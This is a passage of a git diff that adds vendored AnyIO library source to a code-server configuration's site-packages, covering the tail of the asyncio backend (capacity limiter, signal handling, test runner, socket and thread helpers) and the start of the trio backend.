len(self._borrowers) + + @property + def available_tokens(self) -> float: + return self._total_tokens - len(self._borrowers) + + def _notify_next_waiter(self) -> None: + """Notify the next task in line if this limiter has free capacity now.""" + if self._wait_queue and len(self._borrowers) < self._total_tokens: + event = self._wait_queue.popitem(last=False)[1] + event.set() + + def acquire_nowait(self) -> None: + self.acquire_on_behalf_of_nowait(current_task()) + + def acquire_on_behalf_of_nowait(self, borrower: object) -> None: + if borrower in self._borrowers: + raise RuntimeError( + "this borrower is already holding one of this CapacityLimiter's tokens" + ) + + if self._wait_queue or len(self._borrowers) >= self._total_tokens: + raise WouldBlock + + self._borrowers.add(borrower) + + async def acquire(self) -> None: + return await self.acquire_on_behalf_of(current_task()) + + async def acquire_on_behalf_of(self, borrower: object) -> None: + await AsyncIOBackend.checkpoint_if_cancelled() + try: + self.acquire_on_behalf_of_nowait(borrower) + except WouldBlock: + event = asyncio.Event() + self._wait_queue[borrower] = event + try: + await event.wait() + except BaseException: + self._wait_queue.pop(borrower, None) + if event.is_set(): + self._notify_next_waiter() + + raise + + self._borrowers.add(borrower) + else: + try: + await AsyncIOBackend.cancel_shielded_checkpoint() + except BaseException: + self.release() + raise + + def release(self) -> None: + self.release_on_behalf_of(current_task()) + + def release_on_behalf_of(self, borrower: object) -> None: + try: + self._borrowers.remove(borrower) + except KeyError: + raise RuntimeError( + "this borrower isn't holding any of this CapacityLimiter's tokens" + ) from None + + self._notify_next_waiter() + + def statistics(self) -> CapacityLimiterStatistics: + return CapacityLimiterStatistics( + self.borrowed_tokens, + self.total_tokens, + tuple(self._borrowers), + len(self._wait_queue), + ) + + +_default_thread_limiter: RunVar[CapacityLimiter] = RunVar("_default_thread_limiter") + + +# +# Operating system signals +# + + +class _SignalReceiver: + def __init__(self, signals: tuple[Signals, ...]): + self._signals = signals + self._loop = get_running_loop() + self._signal_queue: deque[Signals] = deque() + self._future: asyncio.Future = asyncio.Future() + self._handled_signals: set[Signals] = set() + + def _deliver(self, signum: Signals) -> None: + self._signal_queue.append(signum) + if not self._future.done(): + self._future.set_result(None) + + def __enter__(self) -> _SignalReceiver: + for sig in set(self._signals): + self._loop.add_signal_handler(sig, self._deliver, sig) + self._handled_signals.add(sig) + + return self + + def __exit__( + self, + exc_type: type[BaseException] | None, + exc_val: BaseException | None, + exc_tb: TracebackType | None, + ) -> None: + for sig in self._handled_signals: + self._loop.remove_signal_handler(sig) + + def __aiter__(self) -> _SignalReceiver: + return self + + async def __anext__(self) -> Signals: + await AsyncIOBackend.checkpoint() + if not self._signal_queue: + self._future = asyncio.Future() + await self._future + + return self._signal_queue.popleft() + + +# +# Testing and debugging +# + + +class AsyncIOTaskInfo(TaskInfo): + def __init__(self, task: asyncio.Task): + task_state = _task_states.get(task) + if task_state is None: + parent_id = None + else: + parent_id = task_state.parent_id + + coro = task.get_coro() + assert coro is not None, "created TaskInfo from a completed Task" + super().__init__(id(task), parent_id, task.get_name(), coro) + self._task = weakref.ref(task) + + def has_pending_cancellation(self) -> bool: + if not (task := self._task()): + # If the task isn't around anymore, it won't have a pending cancellation + return False + + if task._must_cancel: # type: ignore[attr-defined] + return True + elif ( + isinstance(task._fut_waiter, asyncio.Future) # type: ignore[attr-defined] + and task._fut_waiter.cancelled() # type: ignore[attr-defined] + ): + return True + + if task_state := _task_states.get(task): + if cancel_scope := task_state.cancel_scope: + return cancel_scope._effectively_cancelled + + return False + + +class TestRunner(abc.TestRunner): + _send_stream: MemoryObjectSendStream[tuple[Awaitable[Any], asyncio.Future[Any]]] + + def __init__( + self, + *, + debug: bool | None = None, + use_uvloop: bool = False, + loop_factory: Callable[[], AbstractEventLoop] | None = None, + ) -> None: + if use_uvloop and loop_factory is None: + if sys.platform != "win32": + import uvloop + + loop_factory = uvloop.new_event_loop + else: + import winloop + + loop_factory = winloop.new_event_loop + + self._runner = Runner(debug=debug, loop_factory=loop_factory) + self._exceptions: list[BaseException] = [] + self._runner_task: asyncio.Task | None = None + + def __enter__(self) -> TestRunner: + self._runner.__enter__() + self.get_loop().set_exception_handler(self._exception_handler) + return self + + def __exit__( + self, + exc_type: type[BaseException] | None, + exc_val: BaseException | None, + exc_tb: TracebackType | None, + ) -> None: + self._runner.__exit__(exc_type, exc_val, exc_tb) + + def get_loop(self) -> AbstractEventLoop: + return self._runner.get_loop() + + def _exception_handler( + self, loop: asyncio.AbstractEventLoop, context: dict[str, Any] + ) -> None: + if isinstance(context.get("exception"), Exception): + self._exceptions.append(context["exception"]) + else: + loop.default_exception_handler(context) + + def _raise_async_exceptions(self) -> None: + # Re-raise any exceptions raised in asynchronous callbacks + if self._exceptions: + exceptions, self._exceptions = self._exceptions, [] + if len(exceptions) == 1: + raise exceptions[0] + elif exceptions: + raise BaseExceptionGroup( + "Multiple exceptions occurred in asynchronous callbacks", exceptions + ) + + async def _run_tests_and_fixtures( + self, + receive_stream: MemoryObjectReceiveStream[ + tuple[Awaitable[T_Retval], asyncio.Future[T_Retval]] + ], + ) -> None: + from _pytest.outcomes import OutcomeException + + with receive_stream, self._send_stream: + async for coro, future in receive_stream: + try: + retval = await coro + except CancelledError as exc: + if not future.cancelled(): + future.cancel(*exc.args) + + raise + except BaseException as exc: + if not future.cancelled(): + future.set_exception(exc) + + if not isinstance(exc, (Exception, OutcomeException)): + raise + else: + if not future.cancelled(): + future.set_result(retval) + + async def _call_in_runner_task( + self, + func: Callable[P, Awaitable[T_Retval]], + *args: P.args, + **kwargs: P.kwargs, + ) -> T_Retval: + if not self._runner_task: + self._send_stream, receive_stream = create_memory_object_stream[ + tuple[Awaitable[Any], asyncio.Future] + ](1) + self._runner_task = self.get_loop().create_task( + self._run_tests_and_fixtures(receive_stream) + ) + + coro = func(*args, **kwargs) + future: asyncio.Future[T_Retval] = self.get_loop().create_future() + self._send_stream.send_nowait((coro, future)) + return await future + + def run_asyncgen_fixture( + self, + fixture_func: Callable[..., AsyncGenerator[T_Retval, Any]], + kwargs: dict[str, Any], + ) -> Iterable[T_Retval]: + asyncgen = fixture_func(**kwargs) + fixturevalue: T_Retval = self.get_loop().run_until_complete( + self._call_in_runner_task(asyncgen.asend, None) + ) + self._raise_async_exceptions() + + yield fixturevalue + + try: + self.get_loop().run_until_complete( + self._call_in_runner_task(asyncgen.asend, None) + ) + except StopAsyncIteration: + self._raise_async_exceptions() + else: + self.get_loop().run_until_complete(asyncgen.aclose()) + raise RuntimeError("Async generator fixture did not stop") + + def run_fixture( + self, + fixture_func: Callable[..., Coroutine[Any, Any, T_Retval]], + kwargs: dict[str, Any], + ) -> T_Retval: + retval = self.get_loop().run_until_complete( + self._call_in_runner_task(fixture_func, **kwargs) + ) + self._raise_async_exceptions() + return retval + + def run_test( + self, test_func: Callable[..., Coroutine[Any, Any, Any]], kwargs: dict[str, Any] + ) -> None: + try: + self.get_loop().run_until_complete( + self._call_in_runner_task(test_func, **kwargs) + ) + except Exception as exc: + self._exceptions.append(exc) + + self._raise_async_exceptions() + + +class AsyncIOBackend(AsyncBackend): + @classmethod + def run( + cls, + func: Callable[[Unpack[PosArgsT]], Awaitable[T_Retval]], + args: tuple[Unpack[PosArgsT]], + kwargs: dict[str, Any], + options: dict[str, Any], + ) -> T_Retval: + @wraps(func) + async def wrapper() -> T_Retval: + task = cast(asyncio.Task, current_task()) + task.set_name(get_callable_name(func)) + _task_states[task] = TaskState(None, None) + + try: + return await func(*args) + finally: + del _task_states[task] + + debug = options.get("debug", None) + loop_factory = options.get("loop_factory", None) + if loop_factory is None and options.get("use_uvloop", False): + if sys.platform != "win32": + import uvloop + + loop_factory = uvloop.new_event_loop + else: + import winloop + + loop_factory = winloop.new_event_loop + + with Runner(debug=debug, loop_factory=loop_factory) as runner: + return runner.run(wrapper()) + + @classmethod + def current_token(cls) -> object: + return get_running_loop() + + @classmethod + def current_time(cls) -> float: + return get_running_loop().time() + + @classmethod + def cancelled_exception_class(cls) -> type[BaseException]: + return CancelledError + + @classmethod + async def checkpoint(cls) -> None: + await sleep(0) + + @classmethod + async def checkpoint_if_cancelled(cls) -> None: + task = current_task() + if task is None: + return + + try: + cancel_scope = _task_states[task].cancel_scope + except KeyError: + return + + while cancel_scope: + if cancel_scope.cancel_called: + await sleep(0) + elif cancel_scope.shield: + break + else: + cancel_scope = cancel_scope._parent_scope + + @classmethod + async def cancel_shielded_checkpoint(cls) -> None: + with CancelScope(shield=True): + await sleep(0) + + @classmethod + async def sleep(cls, delay: float) -> None: + await sleep(delay) + + @classmethod + def create_cancel_scope( + cls, *, deadline: float = math.inf, shield: bool = False + ) -> CancelScope: + return CancelScope(deadline=deadline, shield=shield) + + @classmethod + def current_effective_deadline(cls) -> float: + if (task := current_task()) is None: + return math.inf + + try: + cancel_scope = _task_states[task].cancel_scope + except KeyError: + return math.inf + + deadline = math.inf + while cancel_scope: + deadline = min(deadline, cancel_scope.deadline) + if cancel_scope._cancel_called: + deadline = -math.inf + break + elif cancel_scope.shield: + break + else: + cancel_scope = cancel_scope._parent_scope + + return deadline + + @classmethod + def create_task_group(cls) -> abc.TaskGroup: + return TaskGroup() + + @classmethod + def create_event(cls) -> abc.Event: + return Event() + + @classmethod + def create_lock(cls, *, fast_acquire: bool) -> abc.Lock: + return Lock(fast_acquire=fast_acquire) + + @classmethod + def create_semaphore( + cls, + initial_value: int, + *, + max_value: int | None = None, + fast_acquire: bool = False, + ) -> abc.Semaphore: + return Semaphore(initial_value, max_value=max_value, fast_acquire=fast_acquire) + + @classmethod + def create_capacity_limiter(cls, total_tokens: float) -> abc.CapacityLimiter: + return CapacityLimiter(total_tokens) + + @classmethod + async def run_sync_in_worker_thread( # type: ignore[return] + cls, + func: Callable[[Unpack[PosArgsT]], T_Retval], + args: tuple[Unpack[PosArgsT]], + abandon_on_cancel: bool = False, + limiter: abc.CapacityLimiter | None = None, + ) -> T_Retval: + await cls.checkpoint() + + # If this is the first run in this event loop thread, set up the necessary + # variables + try: + idle_workers = _threadpool_idle_workers.get() + workers = _threadpool_workers.get() + except LookupError: + idle_workers = deque() + workers = set() + _threadpool_idle_workers.set(idle_workers) + _threadpool_workers.set(workers) + + async with limiter or cls.current_default_thread_limiter(): + with CancelScope(shield=not abandon_on_cancel) as scope: + future = asyncio.Future[T_Retval]() + root_task = find_root_task() + if not idle_workers: + worker = WorkerThread(root_task, workers, idle_workers) + worker.start() + workers.add(worker) + root_task.add_done_callback( + worker.stop, context=contextvars.Context() + ) + else: + worker = idle_workers.pop() + + # Prune any other workers that have been idle for MAX_IDLE_TIME + # seconds or longer + now = cls.current_time() + while idle_workers: + if ( + now - idle_workers[0].idle_since + < WorkerThread.MAX_IDLE_TIME + ): + break + + expired_worker = idle_workers.popleft() + expired_worker.root_task.remove_done_callback( + expired_worker.stop + ) + expired_worker.stop() + + context = copy_context() + context.run(set_current_async_library, None) + if abandon_on_cancel or scope._parent_scope is None: + worker_scope = scope + else: + worker_scope = scope._parent_scope + + worker.queue.put_nowait((context, func, args, future, worker_scope)) + return await future + + @classmethod + def check_cancelled(cls) -> None: + scope: CancelScope | None = threadlocals.current_cancel_scope + while scope is not None: + if scope.cancel_called: + raise CancelledError(f"Cancelled by cancel scope {id(scope):x}") + + if scope.shield: + return + + scope = scope._parent_scope + + @classmethod + def run_async_from_thread( + cls, + func: Callable[[Unpack[PosArgsT]], Awaitable[T_Retval]], + args: tuple[Unpack[PosArgsT]], + token: object, + ) -> T_Retval: + async def task_wrapper() -> T_Retval: + __tracebackhide__ = True + if scope is not None: + task = cast(asyncio.Task, current_task()) + _task_states[task] = TaskState(None, scope) + scope._tasks.add(task) + try: + return await func(*args) + except CancelledError as exc: + raise concurrent.futures.CancelledError(str(exc)) from None + finally: + if scope is not None: + scope._tasks.discard(task) + + loop = cast( + "AbstractEventLoop", token or threadlocals.current_token.native_token + ) + if loop.is_closed(): + raise RunFinishedError + + context = copy_context() + context.run(set_current_async_library, "asyncio") + scope = getattr(threadlocals, "current_cancel_scope", None) + f: concurrent.futures.Future[T_Retval] = context.run( + asyncio.run_coroutine_threadsafe, task_wrapper(), loop=loop + ) + return f.result() + + @classmethod + def run_sync_from_thread( + cls, + func: Callable[[Unpack[PosArgsT]], T_Retval], + args: tuple[Unpack[PosArgsT]], + token: object, + ) -> T_Retval: + @wraps(func) + def wrapper() -> None: + try: + set_current_async_library("asyncio") + f.set_result(func(*args)) + except BaseException as exc: + f.set_exception(exc) + if not isinstance(exc, Exception): + raise + + loop = cast( + "AbstractEventLoop", token or threadlocals.current_token.native_token + ) + if loop.is_closed(): + raise RunFinishedError + + f: concurrent.futures.Future[T_Retval] = Future() + loop.call_soon_threadsafe(wrapper) + return f.result() + + @classmethod + async def open_process( + cls, + command: StrOrBytesPath | Sequence[StrOrBytesPath], + *, + stdin: int | IO[Any] | None, + stdout: int | IO[Any] | None, + stderr: int | IO[Any] | None, + **kwargs: Any, + ) -> Process: + await cls.checkpoint() + if isinstance(command, PathLike): + command = os.fspath(command) + + if isinstance(command, (str, bytes)): + process = await asyncio.create_subprocess_shell( + command, + stdin=stdin, + stdout=stdout, + stderr=stderr, + **kwargs, + ) + else: + process = await asyncio.create_subprocess_exec( + *command, + stdin=stdin, + stdout=stdout, + stderr=stderr, + **kwargs, + ) + + stdin_stream = StreamWriterWrapper(process.stdin) if process.stdin else None + stdout_stream = StreamReaderWrapper(process.stdout) if process.stdout else None + stderr_stream = StreamReaderWrapper(process.stderr) if process.stderr else None + return Process(process, stdin_stream, stdout_stream, stderr_stream) + + @classmethod + def setup_process_pool_exit_at_shutdown(cls, workers: set[abc.Process]) -> None: + create_task( + _shutdown_process_pool_on_exit(workers), + name="AnyIO process pool shutdown task", + ) + find_root_task().add_done_callback( + partial(_forcibly_shutdown_process_pool_on_exit, workers) # type:ignore[arg-type] + ) + + @classmethod + async def connect_tcp( + cls, host: str, port: int, local_address: IPSockAddrType | None = None + ) -> abc.SocketStream: + transport, protocol = cast( + tuple[asyncio.Transport, StreamProtocol], + await get_running_loop().create_connection( + StreamProtocol, host, port, local_addr=local_address + ), + ) + transport.pause_reading() + return SocketStream(transport, protocol) + + @classmethod + async def connect_unix(cls, path: str | bytes) -> abc.UNIXSocketStream: + await cls.checkpoint() + loop = get_running_loop() + raw_socket = socket.socket(socket.AF_UNIX) + raw_socket.setblocking(False) + while True: + try: + raw_socket.connect(path) + except BlockingIOError: + f: asyncio.Future = asyncio.Future() + loop.add_writer(raw_socket, f.set_result, None) + f.add_done_callback(lambda _: loop.remove_writer(raw_socket)) + await f + except BaseException: + raw_socket.close() + raise + else: + return UNIXSocketStream(raw_socket) + + @classmethod + def create_tcp_listener(cls, sock: socket.socket) -> SocketListener: + return TCPSocketListener(sock) + + @classmethod + def create_unix_listener(cls, sock: socket.socket) -> SocketListener: + return UNIXSocketListener(sock) + + @classmethod + async def create_udp_socket( + cls, + family: AddressFamily, + local_address: IPSockAddrType | None, + remote_address: IPSockAddrType | None, + reuse_port: bool, + ) -> UDPSocket | ConnectedUDPSocket: + transport, protocol = await get_running_loop().create_datagram_endpoint( + DatagramProtocol, + local_addr=local_address, + remote_addr=remote_address, + family=family, + reuse_port=reuse_port, + ) + if protocol.exception: + transport.close() + raise protocol.exception + + if not remote_address: + return UDPSocket(transport, protocol) + else: + return ConnectedUDPSocket(transport, protocol) + + @classmethod + async def create_unix_datagram_socket( # type: ignore[override] + cls, raw_socket: socket.socket, remote_path: str | bytes | None + ) -> abc.UNIXDatagramSocket | abc.ConnectedUNIXDatagramSocket: + await cls.checkpoint() + loop = get_running_loop() + + if remote_path: + while True: + try: + raw_socket.connect(remote_path) + except BlockingIOError: + f: asyncio.Future = asyncio.Future() + loop.add_writer(raw_socket, f.set_result, None) + f.add_done_callback(lambda _: loop.remove_writer(raw_socket)) + await f + except BaseException: + raw_socket.close() + raise + else: + return ConnectedUNIXDatagramSocket(raw_socket) + else: + return UNIXDatagramSocket(raw_socket) + + @classmethod + async def getaddrinfo( + cls, + host: bytes | str | None, + port: str | int | None, + *, + family: int | AddressFamily = 0, + type: int | SocketKind = 0, + proto: int = 0, + flags: int = 0, + ) -> Sequence[ + tuple[ + AddressFamily, + SocketKind, + int, + str, + tuple[str, int] | tuple[str, int, int, int] | tuple[int, bytes], + ] + ]: + return await get_running_loop().getaddrinfo( + host, port, family=family, type=type, proto=proto, flags=flags + ) + + @classmethod + async def getnameinfo( + cls, sockaddr: IPSockAddrType, flags: int = 0 + ) -> tuple[str, str]: + return await get_running_loop().getnameinfo(sockaddr, flags) + + @classmethod + async def wait_readable(cls, obj: FileDescriptorLike) -> None: + try: + read_events = _read_events.get() + except LookupError: + read_events = {} + _read_events.set(read_events) + + fd = obj if isinstance(obj, int) else obj.fileno() + if read_events.get(fd): + raise BusyResourceError("reading from") + + loop = get_running_loop() + fut: asyncio.Future[bool] = loop.create_future() + + def cb() -> None: + try: + del read_events[fd] + except KeyError: + pass + else: + remove_reader(fd) + + try: + fut.set_result(True) + except asyncio.InvalidStateError: + pass + + try: + loop.add_reader(fd, cb) + except NotImplementedError: + from anyio._core._asyncio_selector_thread import get_selector + + selector = get_selector() + selector.add_reader(fd, cb) + remove_reader = selector.remove_reader + else: + remove_reader = loop.remove_reader + + read_events[fd] = fut + try: + success = await fut + finally: + try: + del read_events[fd] + except KeyError: + pass + else: + remove_reader(fd) + + if not success: + raise ClosedResourceError + + @classmethod + async def wait_writable(cls, obj: FileDescriptorLike) -> None: + try: + write_events = _write_events.get() + except LookupError: + write_events = {} + _write_events.set(write_events) + + fd = obj if isinstance(obj, int) else obj.fileno() + if write_events.get(fd): + raise BusyResourceError("writing to") + + loop = get_running_loop() + fut: asyncio.Future[bool] = loop.create_future() + + def cb() -> None: + try: + del write_events[fd] + except KeyError: + pass + else: + remove_writer(fd) + + try: + fut.set_result(True) + except asyncio.InvalidStateError: + pass + + try: + loop.add_writer(fd, cb) + except NotImplementedError: + from anyio._core._asyncio_selector_thread import get_selector + + selector = get_selector() + selector.add_writer(fd, cb) + remove_writer = selector.remove_writer + else: + remove_writer = loop.remove_writer + + write_events[fd] = fut + try: + success = await fut + finally: + try: + del write_events[fd] + except KeyError: + pass + else: + remove_writer(fd) + + if not success: + raise ClosedResourceError + + @classmethod + def notify_closing(cls, obj: FileDescriptorLike) -> None: + fd = obj if isinstance(obj, int) else obj.fileno() + loop = get_running_loop() + + try: + write_events = _write_events.get() + except LookupError: + pass + else: + try: + fut = write_events.pop(fd) + except KeyError: + pass + else: + try: + fut.set_result(False) + except asyncio.InvalidStateError: + pass + + try: + loop.remove_writer(fd) + except NotImplementedError: + from anyio._core._asyncio_selector_thread import get_selector + + get_selector().remove_writer(fd) + + try: + read_events = _read_events.get() + except LookupError: + pass + else: + try: + fut = read_events.pop(fd) + except KeyError: + pass + else: + try: + fut.set_result(False) + except asyncio.InvalidStateError: + pass + + try: + loop.remove_reader(fd) + except NotImplementedError: + from anyio._core._asyncio_selector_thread import get_selector + + get_selector().remove_reader(fd) + + @classmethod + async def wrap_listener_socket(cls, sock: socket.socket) -> SocketListener: + return TCPSocketListener(sock) + + @classmethod + async def wrap_stream_socket(cls, sock: socket.socket) -> SocketStream: + transport, protocol = await get_running_loop().create_connection( + StreamProtocol, sock=sock + ) + return SocketStream(transport, protocol) + + @classmethod + async def wrap_unix_stream_socket(cls, sock: socket.socket) -> UNIXSocketStream: + return UNIXSocketStream(sock) + + @classmethod + async def wrap_udp_socket(cls, sock: socket.socket) -> UDPSocket: + transport, protocol = await get_running_loop().create_datagram_endpoint( + DatagramProtocol, sock=sock + ) + return UDPSocket(transport, protocol) + + @classmethod + async def wrap_connected_udp_socket(cls, sock: socket.socket) -> ConnectedUDPSocket: + transport, protocol = await get_running_loop().create_datagram_endpoint( + DatagramProtocol, sock=sock + ) + return ConnectedUDPSocket(transport, protocol) + + @classmethod + async def wrap_unix_datagram_socket(cls, sock: socket.socket) -> UNIXDatagramSocket: + return UNIXDatagramSocket(sock) + + @classmethod + async def wrap_connected_unix_datagram_socket( + cls, sock: socket.socket + ) -> ConnectedUNIXDatagramSocket: + return ConnectedUNIXDatagramSocket(sock) + + @classmethod + def current_default_thread_limiter(cls) -> CapacityLimiter: + try: + return _default_thread_limiter.get() + except LookupError: + limiter = CapacityLimiter(40) + _default_thread_limiter.set(limiter) + return limiter + + @classmethod + def open_signal_receiver( + cls, *signals: Signals + ) -> AbstractContextManager[AsyncIterator[Signals]]: + return _SignalReceiver(signals) + + @classmethod + def get_current_task(cls) -> TaskInfo: + return AsyncIOTaskInfo(current_task()) # type: ignore[arg-type] + + @classmethod + def get_running_tasks(cls) -> Sequence[TaskInfo]: + return [AsyncIOTaskInfo(task) for task in all_tasks() if not task.done()] + + @classmethod + async def wait_all_tasks_blocked(cls) -> None: + await cls.checkpoint() + this_task = current_task() + while True: + for task in all_tasks(): + if task is this_task: + continue + + waiter = task._fut_waiter # type: ignore[attr-defined] + if waiter is None or waiter.done(): + await sleep(0.1) + break + else: + return + + @classmethod + def create_test_runner(cls, options: dict[str, Any]) -> TestRunner: + return TestRunner(**options) + + +backend_class = AsyncIOBackend diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/_backends/_trio.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/_backends/_trio.py new file mode 100755 index 0000000..f460a7f --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/_backends/_trio.py @@ -0,0 +1,1346 @@ +from __future__ import annotations + +import array +import math +import os +import socket +import sys +import types +import weakref +from collections.abc import ( + AsyncGenerator, + AsyncIterator, + Awaitable, + Callable, + Collection, + Coroutine, + Iterable, + Sequence, +) +from contextlib import AbstractContextManager +from dataclasses import dataclass +from io import IOBase +from os import PathLike +from signal import Signals +from socket import AddressFamily, SocketKind +from types import TracebackType +from typing import ( + IO, + TYPE_CHECKING, + Any, + Generic, + NoReturn, + TypeVar, + cast, + overload, +) + +import trio.from_thread +import trio.lowlevel +from outcome import Error, Outcome, Value +from trio.lowlevel import ( + current_root_task, + current_task, + notify_closing, + wait_readable, + wait_writable, +) +from trio.socket import SocketType as TrioSocketType +from trio.to_thread import run_sync + +from .. import ( + CapacityLimiterStatistics, + EventStatistics, + LockStatistics, + RunFinishedError, + TaskInfo, + WouldBlock, + abc, +) +from .._core._eventloop import claim_worker_thread +from .._core._exceptions import ( + BrokenResourceError, + BusyResourceError, + ClosedResourceError, + EndOfStream, +) +from .._core._sockets import convert_ipv6_sockaddr +from .._core._streams import create_memory_object_stream +from .._core._synchronization import ( + CapacityLimiter as BaseCapacityLimiter, +) +from .._core._synchronization import Event as BaseEvent +from .._core._synchronization import Lock as BaseLock +from .._core._synchronization import ( + ResourceGuard, + SemaphoreStatistics, +) +from .._core._synchronization import Semaphore as BaseSemaphore +from .._core._tasks import CancelScope as BaseCancelScope +from ..abc import IPSockAddrType, UDPPacketType, UNIXDatagramPacketType +from ..abc._eventloop import AsyncBackend, StrOrBytesPath +from ..streams.memory import MemoryObjectSendStream + +if TYPE_CHECKING: + from _typeshed import FileDescriptorLike + +if sys.version_info >= (3, 10): + from typing import ParamSpec +else: + from typing_extensions import ParamSpec + +if sys.version_info >= (3, 11): + from typing import TypeVarTuple, Unpack +else: + from exceptiongroup import BaseExceptionGroup + from typing_extensions import TypeVarTuple, Unpack + +T = TypeVar("T") +T_Retval = TypeVar("T_Retval") +T_SockAddr = TypeVar("T_SockAddr", str, IPSockAddrType) +PosArgsT = TypeVarTuple("PosArgsT") +P = ParamSpec("P") + + +# +# Event loop +# + +RunVar = trio.lowlevel.RunVar + + +# +# Timeouts and cancellation +# + + +class CancelScope(BaseCancelScope): + def __new__( + cls, original: trio.CancelScope | None = None, **kwargs: object + ) -> CancelScope: + return object.__new__(cls) + + def __init__(self, original: trio.CancelScope | None = None, **kwargs: Any) -> None: + self.__original = original or trio.CancelScope(**kwargs) + + def __enter__(self) -> CancelScope: + self.__original.__enter__() + return self + + def __exit__( + self, + exc_type: type[BaseException] | None, + exc_val: BaseException | None, + exc_tb: TracebackType | None, + ) -> bool: + return self.__original.__exit__(exc_type, exc_val, exc_tb) + + def cancel(self, reason: str | None = None) -> None: + self.__original.cancel(reason) + + @property + def deadline(self) -> float: + return self.__original.deadline + + @deadline.setter + def deadline(self, value: float) -> None: + self.__original.deadline = value + + @property + def cancel_called(self) -> bool: + return self.__original.cancel_called + + @property + def cancelled_caught(self) -> bool: + return self.__original.cancelled_caught + + @property + def shield(self) -> bool: + return self.__original.shield + + @shield.setter + def shield(self, value: bool) -> None: + self.__original.shield = value + + +# +# Task groups +# + + +class TaskGroup(abc.TaskGroup): + def __init__(self) -> None: + self._active = False + self._nursery_manager = trio.open_nursery(strict_exception_groups=True) + self.cancel_scope = None # type: ignore[assignment] + + async def __aenter__(self) -> TaskGroup: + self._active = True + self._nursery = await self._nursery_manager.__aenter__() + self.cancel_scope = CancelScope(self._nursery.cancel_scope) + return self + + async def __aexit__( + self, + exc_type: type[BaseException] | None, + exc_val: BaseException | None, + exc_tb: TracebackType | None, + ) -> bool: + try: + # trio.Nursery.__exit__ returns bool; .open_nursery has wrong type + return await self._nursery_manager.__aexit__(exc_type, exc_val, exc_tb) # type: ignore[return-value] + except BaseExceptionGroup as exc: + if not exc.split(trio.Cancelled)[1]: + raise trio.Cancelled._create() from exc + + raise + finally: + del exc_val, exc_tb + self._active = False + + def start_soon( + self, + func: Callable[[Unpack[PosArgsT]], Awaitable[Any]], + *args: Unpack[PosArgsT], + name: object = None, + ) -> None: + if not self._active: + raise RuntimeError( + "This task group is not active; no new tasks can be started." + ) + + self._nursery.start_soon(func, *args, name=name) + + async def start( + self, func: Callable[..., Awaitable[Any]], *args: object, name: object = None + ) -> Any: + if not self._active: + raise RuntimeError( + "This task group is not active; no new tasks can be started." + ) + + return await self._nursery.start(func, *args, name=name) + + +# +# Subprocesses +# + + +@dataclass(eq=False) +class ReceiveStreamWrapper(abc.ByteReceiveStream): + _stream: trio.abc.ReceiveStream + + async def receive(self, max_bytes: int | None = None) -> bytes: + try: + data = await self._stream.receive_some(max_bytes) + except trio.ClosedResourceError as exc: + raise ClosedResourceError from exc.__cause__ + except trio.BrokenResourceError as exc: + raise BrokenResourceError from exc.__cause__ + + if data: + return bytes(data) + else: + raise EndOfStream + + async def aclose(self) -> None: + await self._stream.aclose() + + +@dataclass(eq=False) +class SendStreamWrapper(abc.ByteSendStream): + _stream: trio.abc.SendStream + + async def send(self, item: bytes) -> None: + try: + await self._stream.send_all(item) + except trio.ClosedResourceError as exc: + raise ClosedResourceError from exc.__cause__ + except trio.BrokenResourceError as exc: + raise BrokenResourceError from exc.__cause__ + + async def aclose(self) -> None: + await self._stream.aclose() + + +@dataclass(eq=False) +class Process(abc.Process): + _process: trio.Process + _stdin: abc.ByteSendStream | None + _stdout: abc.ByteReceiveStream | None + _stderr: abc.ByteReceiveStream | None + + async def aclose(self) -> None: + with CancelScope(shield=True): + if self._stdin: + await self._stdin.aclose() + if self._stdout: + await self._stdout.aclose() + if self._stderr: + await self._stderr.aclose() + + try: + await self.wait() + except BaseException: + self.kill() + with CancelScope(shield=True): + await self.wait() + raise + + async def wait(self) -> int: + return await self._process.wait() + + def terminate(self) -> None: + self._process.terminate() + + def kill(self) -> None: + self._process.kill() + + def send_signal(self, signal: Signals) -> None: + self._process.send_signal(signal) + + @property + def pid(self) -> int: + return self._process.pid + + @property + def returncode(self) -> int | None: + return self._process.returncode + + @property + def stdin(self) -> abc.ByteSendStream | None: + return self._stdin + + @property + def stdout(self) -> abc.ByteReceiveStream | None: + return self._stdout + + @property + def stderr(self) -> abc.ByteReceiveStream | None: + return self._stderr + + +class _ProcessPoolShutdownInstrument(trio.abc.Instrument): + def after_run(self) -> None: + super().after_run() + + +current_default_worker_process_limiter: trio.lowlevel.RunVar = RunVar( + "current_default_worker_process_limiter" +) + + +async def _shutdown_process_pool(workers: set[abc.Process]) -> None: + try: + await trio.sleep(math.inf) + except trio.Cancelled: + for process in workers: + if process.returncode is None: + process.kill() + + with CancelScope(shield=True): + for process in workers: + await process.aclose() + + +# +# Sockets and networking +# + + +class _TrioSocketMixin(Generic[T_SockAddr]): + def __init__(self, trio_socket: TrioSocketType) -> None: + self._trio_socket = trio_socket + self._closed = False + + def _check_closed(self) -> None: + if self._closed: + raise ClosedResourceError + if self._trio_socket.fileno() < 0: + raise BrokenResourceError + + @property + def _raw_socket(self) -> socket.socket: + return self._trio_socket._sock # type: ignore[attr-defined] + + async def aclose(self) -> None: + if self._trio_socket.fileno() >= 0: + self._closed = True + self._trio_socket.close() + + def _convert_socket_error(self, exc: BaseException) -> NoReturn: + if isinstance(exc, trio.ClosedResourceError): + raise ClosedResourceError from exc + elif self._trio_socket.fileno() < 0 and self._closed: + raise ClosedResourceError from None + elif isinstance(exc, OSError): + raise BrokenResourceError from exc + else: + raise exc + + +class SocketStream(_TrioSocketMixin, abc.SocketStream): + def __init__(self, trio_socket: TrioSocketType) -> None: + super().__init__(trio_socket) + self._receive_guard = ResourceGuard("reading from") + self._send_guard = ResourceGuard("writing to") + + async def receive(self, max_bytes: int = 65536) -> bytes: + with self._receive_guard: + try: + data = await self._trio_socket.recv(max_bytes) + except BaseException as exc: + self._convert_socket_error(exc) + + if data: + return data + else: + raise EndOfStream + + async def send(self, item: bytes) -> None: + with self._send_guard: + view = memoryview(item) + while view: + try: + bytes_sent = await self._trio_socket.send(view) + except BaseException as exc: + self._convert_socket_error(exc) + + view = view[bytes_sent:] + + async def send_eof(self) -> None: + self._trio_socket.shutdown(socket.SHUT_WR) + + +class UNIXSocketStream(SocketStream, abc.UNIXSocketStream): + async def receive_fds(self, msglen: int, maxfds: int) -> tuple[bytes, list[int]]: + if not isinstance(msglen, int) or msglen < 0: + raise ValueError("msglen must be a non-negative integer") + if not isinstance(maxfds, int) or maxfds < 